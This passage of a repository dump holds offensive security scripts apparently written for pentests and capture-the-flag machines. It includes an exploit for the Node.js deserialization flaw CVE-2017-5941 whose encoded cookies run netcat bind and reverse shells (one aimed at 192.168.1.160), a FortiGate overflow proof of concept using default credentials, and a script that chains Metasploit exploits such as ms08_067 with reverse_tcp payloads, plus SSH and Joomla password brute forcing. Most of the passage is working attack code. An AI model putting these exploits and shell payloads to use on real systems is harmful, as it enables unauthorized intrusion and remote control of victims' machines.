81 | passwd = raw_input(' set password: ')
82 | our_queue = raw_input(' set queue: ') # /queue/test1
83 | print ENDC
84 |
85 | try:
86 | conn = stomp.Connection( [ (target, port)])
87 | conn.start()
88 | print OKGREEN
89 | print ' [+] connecting to %s on port %s' % ( target , port )
90 | print ENDC
91 | print ' [i] now trying to log in...'
92 |
93 | print OKGREEN
94 | conn.connect(username, passwd, wait=False) # True)
95 | print ENDC
96 |
97 | conn.send( our_queue, 'msg from pentester ;)')
98 | conn.disconnect()
99 |
100 | except stomp.exception.ConnectFailedException:
101 | print FAIL + ' [-] Can not connect to remote MQ, sorry :C\n' + ENDC
102 |
103 | print '' + BOLD
104 | print ' [+] path 13b: testing activemq - admin panel' + ENDC
105 | print ''
106 |
107 |
--------------------------------------------------------------------------------
/enlil-v0.2/files/path14.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # path14: testing jdwp
3 | #
4 | # detailed tutorial:
5 | # https://www.youtube.com/watch?v=VNj46axj9qM
6 | #
7 | # current:
8 | # - gotleak
9 | #
10 |
11 | # --- imports ---
12 | import subprocess
13 | import re
14 | import requests
15 |
16 | # --- super colours ---
17 | HEADER = '\033[95m'
18 | OKBLUE = '\033[94m'
19 | OKGREEN = '\033[92m'
20 | WARNING = '\033[93m'
21 | FAIL = '\033[91m'
22 | ENDC = '\033[0m'
23 | BOLD = '\033[1m'
24 | UNDERLINE = '\033[4m'
25 |
26 |
27 |
28 | def gotleak():
29 | print OKGREEN + ' [+] path 14: get some info from unauthorized JDWP' + ENDC
30 | print ''
31 | print ' based on: https://github.com/IOActive/jdwp-shellifier\n'
32 | # ...
33 |
34 |
35 | grab_or_not = raw_input(' using tool [local/wget]: ')
36 | print '\n' + ENDC
37 |
38 | pocpath = '/tmp/jdwp-shellifier.py' # for 'default'
39 |
40 | if grab_or_not == 'wget':
41 | # based on:
42 | getpoc = 'wget --no-check-certificate https://raw.githubusercontent.com/IOActive/jdwp-shellifier/master/jdwp-shellifier.py -O ' + pocpath
43 | subprocess.call([ getpoc ],shell=True)
44 | print '' + OKGREEN
45 | print ' poc should be ready to configure...' + ENDC
46 |
47 | elif grab_or_not == 'local':
48 | print ' [1] /tmp/jdwp-shellifier.py ("default")'
49 | print ' [2] < /full/path2/po.c >'
50 |
51 | choice = raw_input(' [1/2]: ? ')
52 | if choice == '1':
53 | pocpath = '/tmp/jdwp-shellifier.py'
54 |
55 | elif choice == '2':
56 | print BOLD
57 | pocpath = raw_input(' type full path to jdwp-shellifier.py >> ')
58 | print ENDC
59 |
60 | print BOLD
61 | target = raw_input(' set target: ')
62 | port = raw_input(' set port: ')
63 | logfile = '/tmp/jwdp-enum-' + target + '.log'
64 | print ENDC
65 |
66 | #1: runjwp = 'python ' + pocpath + ' -port ' + port + ' -t ' + target
67 | #2:
68 | runjwp = 'python ' + pocpath + ' --port ' + port
69 | runjwp += ' -t ' + target + ' --break-on "java.lang.String.indexOf"'
70 | runjwp += ' > ' + logfile
71 |
72 | subprocess.call([ runjwp ], shell=True)
73 |
74 | print OKGREEN + '\n [+] poc finished, checking results:' + ENDC
75 |
76 | ####
77 |
78 | print '' + BOLD
79 | print ' [+] path 14: unauthorized JDWP check - finished.' + ENDC
80 | print ''
81 |
82 |
83 |
--------------------------------------------------------------------------------
/expRcEss_js.py:
--------------------------------------------------------------------------------
1 | root@nippur:/var/www/html/a# cat /home/c/ctf/tod/expRcEss_js.py
2 | #!/usr/bin/env python
3 | # expRcEss_js.py - simple poc for CVE-2017-5941
4 | #
5 | # more details:
6 | # https://nvd.nist.gov/vuln/detail/CVE-2017-5941
7 | # https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/
8 | # https://code610.blogspot.com/2019/03/temple-of-doom1-ctf.html
9 | #
10 | # 24.02.2019@22:00
11 | #
12 | import sys, requests
13 |
14 | target = sys.argv[1]
15 | target_port = sys.argv[2]
16 |
17 | sess = requests.session()
18 |
19 | check_url = 'http://' + target + ':' + target_port
20 | check_req = sess.get(check_url)
21 | check_resp = check_req.text
22 | found_headers = check_req.headers['X-Powered-By']
23 |
24 |
25 | print '[i] Connecting to %s on port %s' % ( target, target_port )
26 |
27 | if 'Express' in found_headers:
28 | print '[+] Node.js Express identified by headers; proceeding...'
29 |
30 | print '[i] Creating final request'
31 | # nc ip 4444 -e /bin/sh
32 | #profile_cookie = "eyJ1c2VybmFtZSI6Il8kJE5EX0ZVTkMkJF9mdW5jdGlvbigpe3JldHVybiByZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykuZXhlY1N5bmMoJ25jIDE5Mi4xNjguMS4xNjAgNDQ0NCAtZSAvYmluL3NoJywoZSxvdXRvLGVycik9Pntjb25zb2xlLmxvZyhvdXQpO30pO30oKSJ9"
33 | # nc -lvvp 4444 -e /bin/sh
34 | #profile_cookie = "eyJ1c2VybmFtZSI6Il8kJE5EX0ZVTkMkJF9mdW5jdGlvbigpe3JldHVybiByZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykuZXhlY1N5bmMoJ25jIC1sdnZwIDQ0NDQgLWUgL2Jpbi9zaCAmJywoZSxvdXRvLGVycik9Pntjb25zb2xlLmxvZyhvdXQpO30pO30oKSJ9"
35 | profile_cookie = "eyJ1c2VybmFtZSI6Il8kJE5EX0ZVTkMkJF9mdW5jdGlvbiAoKXtyZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykuZXhlYygnbmMgLWx2dnAgNDQ0NCAtZSAvYmluL3NoJywgZnVuY3Rpb24oZXJyb3IsIHN0ZG91dCwgc3RkZXJyKSB7IGNvbnNvbGUubG9nKHN0ZG91dCkgfSk7fSgpIn0KCg=="
36 | #profile_cookie = "eyJ1c2VybmFtZSI6Il8kJE5EX0ZVTkMkJF9mdW5jdGlvbiAoKXtyZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykuZXhlYygnaWQ7bHM7cHdkO3dob2FtaTt1bmFtZSAtYScsIGZ1bmN0aW9uKGVycm9yLCBzdGRvdXQsIHN0ZGVycikgeyBjb25zb2xlLmxvZyhzdGRvdXQpIH0pO30oKSJ9Cgo="
37 |
38 |
39 | profile_cookies = {'profile':profile_cookie}
40 | print profile_cookies
41 |
42 | fin_req = sess.get(check_url, cookies=profile_cookies)
43 | fin_resp = fin_req.text
44 |
45 | print '[+] shell should be ready now.'
46 | print fin_resp
47 |
48 |
49 | print '\n[+] poc finished.'
50 |
51 |
--------------------------------------------------------------------------------
/fantamorph-01-ex-0x3eda38dc.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/c610/tmp/45f1ff4684366265c47182a8496a95a2c9b439d6/fantamorph-01-ex-0x3eda38dc.zip
--------------------------------------------------------------------------------
/fiddler bug.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/c610/tmp/45f1ff4684366265c47182a8496a95a2c9b439d6/fiddler bug.zip
--------------------------------------------------------------------------------
/forteagate.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # forteanet.py - quick poc for fortigate vm httpsd overflow
3 | # found: 23:20 @ 09.09.2019
4 | # skeleton : 03:18 @ 10.09.2019
5 | # code610 blogspot com
6 | #
7 |
8 | import sys, re, requests, json
9 |
10 | # presets
11 | target = 'http://' + sys.argv[1]
12 | user = 'admin'
13 | passwd = 'P@ssw0rd'
14 |
15 | # hello world
16 | print '[+] checking FG VM appliance : %s' % ( target )
17 |
18 | # log in to get session
19 | session = requests.session()
20 | initlink = target + '/ng/'
21 |
22 | initreq = session.get(initlink, verify=False, allow_redirects=True)
23 | initresp = initreq.text
24 | initcode = initreq.status_code
25 |
26 | if initcode == 200:
27 | print '[+] found login page, trying (%s:%s)' % ( user, passwd )
28 |
29 | loglink = target + '/logincheck'
30 | logdata = {
31 | 'ajax':1,
32 | 'username':user,
33 | 'secretkey':passwd,
34 | 'redir':'%2Fng'
35 | }
36 | log = session.post(loglink, data=logdata, allow_redirects=True)
37 | logresp = log.text
38 | logheads = log.headers
39 |
40 | headers = logheads['set-cookie']
41 | find_token = re.compile('ccsrftoken="(.*?)"')
42 | found_token = re.search(find_token, headers)
43 |
44 | if found_token:
45 | token = found_token.group(1)
46 | print '[+] found token: %s' % ( token )
47 |
48 | lastpost = target + '/api/v2/cmdb/router/static?datasource=1&with_meta=1'
49 | siemka = 'A'* 216 + 'B'*6 + 'CC'
50 |
51 | headers2 = {'X-CSRFTOKEN':token, 'Content-type':'application/json'}
52 | #print headers2
53 |
54 | postdata = [{"dst":siemka,"device":{"name":"port10","real_interface_name":"port10","vdom":"root","is_system_interface":"true","status":"up","in_bandwidth_limit":0,"out_bandwidth_limit":0,"dynamic_addressing":"false","dhcp4_client_count":0,"dhcp6_client_count":0,"role":"undefined","mac_address":"00:0c:29:22:65:1a","link":"up","duplex":"half","supports_device_id":"true","valid_in_policy":"true","supports_fortitelemetry":"true","fortitelemetry":"false","is_used":"false","is_physical":"true","media":"rj45","is_aggregatable":"true","is_explicit_proxyable":"true","is_ipsecable":"true","is_routable":"true","tagging":[],"type":"physical","icon":"ftnt-interface-rj45-up","q_origin_key":"port10","interface-name":"port10","datasource":"system.interface","label":"port10","sortValue":0}}]
55 |
56 | try:
57 | dopost = session.post(lastpost, data=json.dumps(postdata), headers=headers2, allow_redirects=True)
58 | print dopost.text
59 |
60 | except requests.exceptions.ConnectionError, e:
61 | print '[!] Connection reset; check log->events now.'
62 |
63 | # cheers
64 | # o/
65 |
66 |
--------------------------------------------------------------------------------
/getRes.js:
--------------------------------------------------------------------------------
1 | var ourTab = ['admin','administrator','robots.txt','somRandErr.file','joomla','wp-admin']
2 | var req = new XMLHttpRequest();
3 |
4 | for (var x = 0 ; x < ourTab.length ; x++){
5 |
6 | req.open('GET', ourTab[x], false);
7 | req.onreadystatechange = function() {
8 | if(req.readyState && req.status == 200) {
9 | document.write("Check : " + ourTab[x] + " -> Status: " + req.status + "
");
10 | }
11 | if (req.readyState && req.status == 404){
12 | document.write("Check : " + ourTab[x] + " -> Status: " + req.status + "
");
13 | }
14 | if (req.readyState && req.status == 403){
15 | document.write("Check : " + ourTab[x] + " -> Status: " + req.status + "
");
16 | }
17 | }
18 | req.send();
19 |
20 |
21 |
22 | }
23 |
--------------------------------------------------------------------------------
/grabash.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # grab-a-sh.py
3 | # version just1.
4 | # idea : 05082016
5 | # by code610
6 | #
7 |
8 | # imports
9 | import sys
10 | import subprocess
11 | import os
12 | import datetime # for 'now'
13 |
14 | # defines
15 | target = sys.argv[1]
16 | pwd = os.getcwd()
17 | allLogs = pwd + '/logs/'
18 | tLogDir = allLogs + target + '/'
19 | rcfile = tLogDir + 'msf.rc'
20 | rcwww = tLogDir + 'www.rc'
21 | rcspool = tLogDir + 'output.msf'
22 | wwwspool = tLogDir + 'output.www'
23 | nmaplogfile = tLogDir + '/nmap-tcp-' + target + '.log'
24 | now = datetime.datetime.now()
25 | today = now.strftime("%d-%m-%Y %H:%M")
26 | postfile = 'post.rc'
27 | path2post = tLogDir + postfile
28 |
29 | # test functions:
30 | #
31 |
32 | # modules for default FTP (based on 21/tcp)
33 | def check_21(target):
34 | print ' + loading : current ftp modules'
35 | print ' + anonymous'
36 | print ''
37 | print ''
38 |
39 | saveNetRc('use auxiliary/scanner/ftp/anonymous\n')
40 | saveNetRc('set RHOSTS ' + target + '\n')
41 | saveNetRc('run\n')
42 |
43 | # saveNetRc('use auxiliary/scanner/ftp/ftp_login\n') # do you want to bruteforce? ;\
44 |
45 | saveNetRc('use auxiliary/scanner/ftp/ftp_version\n')
46 | saveNetRc('set RHOSTS ' + target + '\n')
47 | saveNetRc('run\n')
48 |
49 |
50 | # modules for Microsoft FTPd
51 | def check_21_ms(target):
52 | print ' + loading : current M$ ftp modules'
53 | print ' + ms09_053_ftpd_nlst' # if MS FTP found
54 | saveNetRc('use exploit/windows/ftp/ms09_053_ftpd_nlst\n')
55 | saveNetRc('set RHOST ' + target + '\n')
56 | saveNetRc('run\n')
57 |
58 | # modules for ProFTPD
59 | def check_21_pftpd(target):
60 | print ' + loading : current ProFTPD modules'
61 | print ' + proftp_telnet_iac'
62 |
63 | saveNetRc('use exploit/freebsd/ftp/proftp_telnet_iac\n')
64 | saveNetRc('set RHOSTS ' + target + '\n')
65 | saveNetRc('run\n')
66 |
67 | saveNetRc('use exploit/linux/ftp/proftp_sreplace\n')
68 | saveNetRc('set RHOST ' + target + '\n')
69 | saveNetRc('run\n')
70 |
71 | def check_21_pure(target):
72 | print ' + loading : current Pure-FTPd'
73 | print ' + pureftpd_bash_env_exec'
74 | saveNetRc('use exploit/multi/ftp/pureftpd_bash_env_exec\n')
75 | saveNetRc('set RHOST ' + target + '\n')
76 | saveNetRc('run\n')
77 |
78 |
79 | # modules for SSH
80 | def check_22(target):
81 | print ' + loading : current ssh modules:'
82 | print ' + ssh_version'
83 | print ' + ssh_enumusers'
84 | print ' + ssh_login'
85 | saveNetRc('use auxiliary/scanner/ssh/ssh_version\n')
86 | saveNetRc('set RHOSTS ' + target + '\n')
87 | saveNetRc('run\n')
88 |
89 | saveNetRc('use auxiliary/scanner/ssh/ssh_enumusers\n')
90 | saveNetRc('set USER_FILE /usr/share/metasploit-framework/data/wordlists/ipmi_users.txt\n')
91 | saveNetRc('set RHOSTS ' + target + '\n')
92 | saveNetRc('run\n')
93 |
94 | saveNetRc('use auxiliary/scanner/ssh/ssh_login\n')
95 | saveNetRc('set RHOSTS ' + target + '\n')
96 | saveNetRc('set PASS_FILE /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt\n')
97 | saveNetRc('set VERBOSE false\n')
98 | saveNetRc('set USERNAME root\n')
99 | saveNetRc('run\n')
100 |
101 | # modules for rpcinfo
102 | def check_111(target):
103 | print ' + loading : current rpc modules:'
104 | print ' + sunrpc_portmapper'
105 | print ' + nfsmount' # TODO: check udp
106 | saveNetRc('use auxiliary/scanner/misc/sunrpc_portmapper\n')
107 | saveNetRc('set RHOSTS ' + target + '\n')
108 | saveNetRc('run\n')
109 |
110 | saveNetRc('use auxiliary/scanner/nfs/nfsmount\n')
111 | saveNetRc('set RHOSTS ' + target + '\n')
112 | saveNetRc('run\n')
113 |
114 | # modules for dcerpc
115 | def check_135(target):
116 | print ' + loading : current dcerpc modules:'
117 | print ' + ms03_026_dcom'
118 | print ' + sunrpc_portmapper'
119 | print ' + tcp_dcerpc_auditor'
120 | print ' + endpoint_mapper'
121 |
122 | saveNetRc('use exploit/windows/dcerpc/ms03_026_dcom\n')
123 | saveNetRc('set RHOST ' + target + '\n')
124 | saveNetRc('run\n')
125 |
126 | saveNetRc('use auxiliary/scanner/misc/sunrpc_portmapper\n')
127 | saveNetRc('set RHOSTS ' + target + '\n')
128 | saveNetRc('run\n')
129 |
130 | saveNetRc('use auxiliary/scanner/dcerpc/tcp_dcerpc_auditor\n')
131 | saveNetRc('set RHOSTS ' + target + '\n')
132 | saveNetRc('run\n')
133 |
134 | saveNetRc('use auxiliary/scanner/dcerpc/endpoint_mapper\n')
135 | saveNetRc('set RHOSTS ' + target + '\n')
136 | saveNetRc('run\n')
137 |
138 | # modules for Samba (139/tcp @Linux)
139 | def check_139_lin(target):
140 | print ' + loading : current samba modules:'
141 | print ' + usermap_script'
142 | saveNetRc('use exploit/multi/samba/usermap_script\n')
143 | saveNetRc('set RHOST ' + target + '\n')
144 | saveNetRc('set PAYLOAD cmd/unix/reverse_netcat\n')
145 | saveNetRc('set LHOST ' + str(elhost()) + '\n')
146 | saveNetRc('run\n') # TODO: python -c 'import pty;pty.spawn("/bin/bash")' # to get root
147 |
148 | # modules for SMB
149 | def check_139(target):
150 | print ' + loading : current smb modules:'
151 | print ' + nbname'
152 | print ' + smb_enumshares'
153 | print ' + smb_enumusers_domain'
154 | print ' + smb_lookupsid'
155 | print ' + pipe_auditor'
156 | print ' + pipe_dcerpc_auditor'
157 |
158 | saveNetRc('use auxiliary/scanner/netbios/nbname\n')
159 | saveNetRc('set RHOSTS ' + target + '\n')
160 | saveNetRc('run\n')
161 |
162 | saveNetRc('use auxiliary/scanner/smb/smb_enumshares\n')
163 | saveNetRc('set RHOSTS ' + target + '\n')
164 | saveNetRc('run\n')
165 |
166 | saveNetRc('use auxiliary/scanner/smb/smb_enumusers_domain\n')
167 | saveNetRc('set RHOSTS ' + target + '\n')
168 | saveNetRc('run\n')
169 |
170 | saveNetRc('use auxiliary/scanner/smb/smb_lookupsid\n')
171 | saveNetRc('set RHOSTS ' + target + '\n')
172 | saveNetRc('run\n')
173 |
174 | saveNetRc('use auxiliary/scanner/smb/pipe_auditor\n')
175 | saveNetRc('set RHOSTS ' + target + '\n')
176 | saveNetRc('run\n')
177 |
178 | saveNetRc('use auxiliary/scanner/smb/pipe_dcerpc_auditor\n')
179 | saveNetRc('set RHOSTS ' + target + '\n')
180 | saveNetRc('run\n')
181 |
182 |
183 | # modules if HTTP found
184 | def check_http(target, rport):
185 | print ' + loading : http modules ...'
186 | print ' + http_header'
187 | print ' + dir_scanner'
188 | print ' + trace'
189 | print ' + options'
190 | print ' + robots_txt'
191 | print ' + scrapper (get Title)'
192 |
193 | saveNetRc('use auxiliary/scanner/http/http_header\n')
194 | saveNetRc('set RHOSTS ' + target + '\n')
195 | saveNetRc('set RPORT ' + rport + '\n')
196 | saveNetRc('run\n')
197 |
198 | saveNetRc('use auxiliary/scanner/http/dir_scanner\n')
199 | saveNetRc('set RHOSTS ' + target + '\n')
200 | saveNetRc('set THREADS 10\n')
201 | saveNetRc('set DICTIONARY /usr/share/dirb/wordlists/common.txt\n')
202 | saveNetRc('set RPORT ' + rport + '\n')
203 | saveNetRc('run\n')
204 |
205 | saveNetRc('use auxiliary/scanner/http/trace\n')
206 | saveNetRc('set RHOSTS ' + target + '\n')
207 | saveNetRc('set RPORT ' + rport + '\n')
208 | saveNetRc('run\n')
209 |
210 | saveNetRc('use auxiliary/scanner/http/options\n')
211 | saveNetRc('set RHOSTS ' + target + '\n')
212 | saveNetRc('set RPORT ' + rport + '\n')
213 | saveNetRc('run\n')
214 |
215 | saveNetRc('use auxiliary/scanner/http/robots_txt\n')
216 | saveNetRc('set RHOSTS ' + target + '\n')
217 | saveNetRc('set RPORT ' + rport + '\n')
218 | saveNetRc('run\n')
219 |
220 | saveNetRc('use auxiliary/scanner/http/scraper\n')
221 | saveNetRc('set RHOSTS ' + target + '\n')
222 | saveNetRc('set RPORT ' + rport + '\n')
223 | saveNetRc('run\n')
224 |
225 | # modules for Apache
226 | def check_apache(target, rport):
227 | print ' + loading : apache modules ...'
228 | print ' + apache_userdir_enum'
229 | saveWWWRc('use auxiliary/scanner/http/apache_userdir_enum\n')
230 | saveWWWRc('set VERBOSE false\n')
231 | saveWWWRc('set RHOSTS ' + target + '\n')
232 | saveWWWRc('set RPORT ' + rport + '\n')
233 | saveWWWRc('run\n')
234 |
235 | # modules for IIS
236 | def check_iis(target, rport):
237 | print ' + loading : iis modules ...'
238 | print ' + webdav_scanner'
239 | saveNetRc('use auxiliary/scanner/http/webdav_scanner\n')
240 | saveNetRc('set RHOSTS ' + target + '\n')
241 | saveNetRc('set RPORT ' + rport + '\n')
242 | saveNetRc('run\n')
243 |
244 | # modules for Joomla
245 | def check_joomla(target,rport, targeturi):
246 | print ' + loading : joomla modules, port : ', rport
247 | print ' + joomla_bruteforce'
248 | print ' + joomla_version'
249 | print ' + joomla_plugins'
250 | print ' + joomlash' # https://github.com/c610/modules/blob/master/joomlash.rb
251 | # TODO: finish joomla_upload_shell.rb
252 | # TODO: remember to properly set TARGETURI; see: dir_scanner
253 |
254 | print '\n'
255 | print '[i] Current TARGETURI to ' + str(targeturi) + '\n'
256 | saveWWWRc('use auxiliary/scanner/http/joomla_bruteforce_login\n')
257 | saveWWWRc('set TARGETURI + ' + targeturi + '\n') # TODO
258 | saveWWWRc('set RHOSTS ' + target + '\n')
259 | saveWWWRc('set RPORT ' + rport + '\n')
260 | saveWWWRc('set AUTH_URI /joomla2/administrator/index.php \n') # TODO: 3rd param tmpuri
261 | saveWWWRc('set PASS_FILE /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt\n')
262 | saveWWWRc('set VERBOSE false\n')
263 | saveWWWRc('set USERNAME admin\n')
264 | saveWWWRc('set FORM_URI /joomla2/administrator\n') # TODO
265 | saveWWWRc('set STOP_ON_SUCCESS true\n')
266 | saveWWWRc('run\n') # TODO: result (user:pass) to joomlash
267 |
268 | saveWWWRc('use exploit/unix/webapp/joomlash\n')
269 | saveWWWRc('set RHOST ' + target + '\n')
270 | saveWWWRc('set RPORT ' + rport + '\n')
271 | saveWWWRc('set TARGETURI /joomla2/\n') # ' + targeturi + '\n') TODO!
272 | saveWWWRc('set USERNAME admin\n') #TODO : connect with joomla_bruteforce_login
273 | saveWWWRc('set PASSWORD admin\n')
274 | saveWWWRc('run\n')
275 |
276 |
277 | saveWWWRc('use auxiliary/scanner/http/joomla_version\n')
278 | saveWWWRc('set RHOSTS ' + target + '\n')
279 | saveWWWRc('set RPORT ' + rport + '\n')
280 | saveWWWRc('run\n')
281 |
282 | saveWWWRc('use auxiliary/scanner/http/joomla_plugins\n')
283 | saveWWWRc('set RHOSTS ' + target + '\n')
284 | saveWWWRc('set RPORT ' + rport + '\n')
285 | saveWWWRc('run\n')
286 |
287 | # modules for git
288 | def check_git(target, rport):
289 | print ' + loading : git modules ...'
290 | print ' + git_scanner'
291 |
292 | saveNetRc('use auxiliary/scanner/http/git_scanner\n')
293 | saveNetRc('set RHOSTS ' + target + '\n')
294 | saveNetRc('set RPORT ' + rport + '\n')
295 | saveNetRc('run\n')
296 |
297 | # modules for Axis2 CTF
298 | def check_axis2(target,rport):
299 | print ' + loading : axis2 modules...'
300 | print ' + axis2_lfi_ctf' # you need to add this module to default msf
301 |
302 | saveWWWRc('use auxiliary/scanner/http/axis2_lfi_ctf\n')
303 | saveWWWRc('set RHOSTS ' + target + '\n')
304 | saveWWWRc('set RPORT ' + rport + '\n')
305 | saveWWWRc('run\n')
306 |
307 | # test will start during 2nd msf run.
308 | # links found by dir_scanner are used here to define
309 | # tests for specific http server or webapp
310 | # TODO: more detailed tests...
311 | def check_http_dirs(target):
312 | fp = open(rcspool,'r') # read from msf.net output file
313 | lines = fp.readlines()
314 |
315 |
316 | print '[+] Please wait, I\'m reading output from ' + str(rcspool) + '\n'
317 | print '[+] Preparing HTTP attacks basing on found directories'
318 | for line in lines: # TODO
319 | if line.find('Found http://') != -1:
320 |
321 | # fix: set new rport
322 | newport = line.split(':')
323 | rrport = newport[2].split('/')[0] # new RPORT for all tests below
324 |
325 | # print("Setting new RPORT for this test: " + str(rrport)) # for debug
326 | if line.find('/administrator/') != -1:
327 | print ' [+] probably Joomla; preparing tests...'
328 | tmpuri = '/administrator/' # TODO change!
329 | check_joomla(target, rrport, tmpuri)
330 |
331 | elif line.find('/server-status') != -1:
332 | print ' [+] Found "/server-status"; probably Apache...'
333 | # TODO: we need a 'marker' to set apache tests already done (if any)
334 | check_apache(target,rrport)
335 |
336 | elif line.find('/axis2/') != -1: # prepared for CTF Axis2 by PentesterLab.com
337 | # TODO: link to writeup
338 | print ' [+] probably Axis2; preparing tests...'
339 | check_axis2(target,rrport)
340 |
341 | elif line.find('/joomla/') != -1:
342 | print ' [+] probably Joola; preparing tests...' # TODO: change tmpuri
343 | tmpuri = '/joomla/'
344 | check_joomla(target, rrport, tmpuri)
345 |
346 | elif line.find('/joomla2/') != -1:
347 | print ' [+] probably Joola; preparing tests...' # TODO: change targeturitmp
348 | tmpuri = '/joomla2/'
349 | check_joomla(target, rrport, targeturi)
350 |
351 | elif line.find('.git') != -1:
352 | print ' [+] probably git found; preparing tests...'
353 | check_git(target, rrport)
354 | tmpuri = '' # TODO clean
355 |
356 |
357 | # modules if HTTPS found
358 | def check_https(target, rport):
359 | print ' + loading : https modules ...'
360 | print ' + http_hsts'
361 | print ' + cert'
362 | print ' + ssl'
363 | print ' + ssl_version'
364 |
365 | saveNetRc('use use auxiliary/scanner/http/http_hsts\n')
366 | saveNetRc('set RHOSTS ' + target + '\n')
367 | saveNetRc('set RPORT ' + rport + '\n')
368 | saveNetRc('run\n')
369 |
370 | saveNetRc('use auxiliary/scanner/http/cert\n')
371 | saveNetRc('set RHOSTS ' + target + '\n')
372 | saveNetRc('set RPORT ' + rport + '\n')
373 | saveNetRc('run\n')
374 |
375 | saveNetRc('use auxiliary/scanner/http/ssl\n')
376 | saveNetRc('set RHOSTS ' + target + '\n')
377 | saveNetRc('set RPORT ' + rport + '\n')
378 | saveNetRc('run\n')
379 |
380 | saveNetRc('use auxiliary/scanner/http/ssl_version\n')
381 | saveNetRc('set RHOSTS ' + target + '\n')
382 | saveNetRc('set RPORT ' + rport + '\n')
383 | saveNetRc('run\n')
384 |
385 |
386 | def check_445(target):
387 | print ' + loading : 445 modules ...'
388 | print ' + ms08_067_netapi'
389 |
390 | saveNetRc('use exploit/windows/smb/ms08_067_netapi\n')
391 | saveNetRc('set RHOST ' + target + '\n')
392 | saveNetRc('set PAYLOAD windows/meterpreter/reverse_tcp\n')
393 | saveNetRc('set EndOnSession true\n')
394 | saveNetRc('set LHOST ' + str(elhost()) + '\n')
395 | makePost(path2post)
396 | saveNetRc('set AutoRunScript multi_console_command -rc ' + path2post + '\n')
397 | saveNetRc('run\n')
398 |
399 | # modules for Oracle 9i ftp bug in PASS
400 | def check_2100(target):
401 | print ' + loading : Oracle 9i modules'
402 | print ' + oracle9i_xdb_ftp_pass'
403 | print ' + oracle9i_xdb_ftp_unlock'
404 | saveNetRc('use exploit/windows/ftp/oracle9i_xdb_ftp_pass\n')
405 | saveNetRc('set RHOST ' + target + '\n')
406 | saveNetRc('run\n')
407 |
408 | saveNetRc('use exploit/windows/ftp/oracle9i_xdb_ftp_unlock\n')
409 | saveNetRc('set RHOST ' + target + '\n')
410 | saveNetRc('run\n')
411 |
412 |
413 | # modules for SSDP/UPnP
414 | def check_2869(target):
415 | print ' + loading : 2869 modules ...'
416 | print ' + ssdp_msearch'
417 | print ' + ssdp_amp'
418 |
419 | saveNetRc('use auxiliary/scanner/upnp/ssdp_msearch\n')
420 | saveNetRc('set RHOSTS ' + target + '\n')
421 | saveNetRc('run\n')
422 |
423 | saveNetRc('use auxiliary/scanner/upnp/ssdp_amp\n')
424 | saveNetRc('set RHOSTS ' + target + '\n')
425 | saveNetRc('run\n')
426 |
427 | # modules for DistCC Daemon
428 | def check_3632(target):
429 | print ' + loading : DistCC Daemon modules' # for Metasploitable
430 | print ' + distcc_exec'
431 | saveNetRc('use exploit/unix/misc/distcc_exec\n')
432 | saveNetRc('set RHOST ' + target + '\n')
433 | saveNetRc('set PAYLOAD cmd/unix/bind_perl\n')
434 | saveNetRc('run\n')
435 |
436 | # modules for SSDP/UPnP
437 | def check_5357(target):
438 | print ' + loading : 5357 modules ...'
439 | print ' + ssdp_msearch'
440 | print ' + ssdp_amp'
441 |
442 | saveNetRc('use auxiliary/scanner/upnp/ssdp_msearch\n')
443 | saveNetRc('set RHOSTS ' + target + '\n')
444 | saveNetRc('run\n')
445 |
446 | saveNetRc('use auxiliary/scanner/upnp/ssdp_amp\n')
447 | saveNetRc('set RHOSTS ' + target + '\n')
448 | saveNetRc('run\n')
449 |
450 |
451 | # code functions:
452 | # TODO: readSpool for output.www; more details; ...
453 | # ...20.08.and.some.changes...
454 | def thanks():
455 | # :)
456 | print '\n'
457 | print '*'*80
458 | print '\t\t(let\'s say...) summary:'
459 | print '*'*80
460 | print ' Scanned : ', today
461 |
462 | # summary for 1st msf
463 | print '-'*80
464 | print ' Summary for 1st output:\n'
465 | fp1 = open(nmaplogfile, 'r')
466 | s_ports = fp1.readlines()
467 |
468 | countScanned = 0
469 | foundOpen = 0
470 |
471 | for oport in s_ports:
472 | if oport.find('open') != -1:
473 | foundOpen += 1
474 |
475 | fp = open(rcfile, 'r') # read all 'use '
476 | used = fp.readlines()
477 |
478 | print '[+] Ports:'
479 | print ' Total ports : ', foundOpen
480 |
481 | for u in used:
482 | if u.find('use ') != -1:
483 | countScanned += 1
484 | nu = u.split(' ')[1]
485 | print ' - test used : ' + str(nu)
486 |
487 | print ' Modules prepared : ', countScanned
488 |
489 |
490 |
491 |
492 | print '\n'
493 |
494 | # summary for 2nd msf
495 | print '-'*80
496 | print ' Summary for 2nd output:\n' # TODO
497 |
498 | # fp2 = open(wwwspool, 'r') # tmp change for reading output from 1st msf
499 |
500 | fp2 = open(rcspool,'r') # reading from outpupt.msf; looking for 'Found http' links
501 | links = fp2.readlines()
502 |
503 | for link in links:
504 | if link.find('Found http') != -1:
505 | nlink = link.split(' ')
506 | codelink = nlink[3]
507 | gotlink = nlink[2]
508 | print 'Code ' + str(codelink) + ' for : ', str(gotlink)
509 |
510 | print '\n'
511 | fp1.close()
512 | fp2.close()
513 |
514 |
515 | print '\nNow we will check 2nd file: ' + str(wwwspool) + '\n'
516 |
517 | readWWW = open(wwwspool,'r')
518 | lines = readWWW.readlines()
519 |
520 | for line in lines:
521 | if line.find(target) != -1: # TODO : fix this ififififif;[
522 | if line.find("Successful login 'admin'") != -1:
523 | splitl = line.split("'")
524 | print ' Joomla user : ' + str(splitl[1])
525 | print ' Joomla pass : ' + str(splitl[3])
526 |
527 | if line.find('templates/beez3/error.php?x=cmd') != -1:
528 | print ' [+] It seems to we already have a shell :)\n'
529 |
530 |
531 | # for LHOST
532 | def elhost():
533 | f = os.popen('/sbin/ifconfig eth0 | grep "inet\ addr" | cut -d: -f2 | cut -d" " -f1')
534 | lhost=f.read()
535 | return lhost
536 |
537 | # RC for meterpreter; now prepared as poc for ms08_067_netapi module (check_445)
538 | def makePost(postme):
539 | fp = open(path2post,'w')
540 |
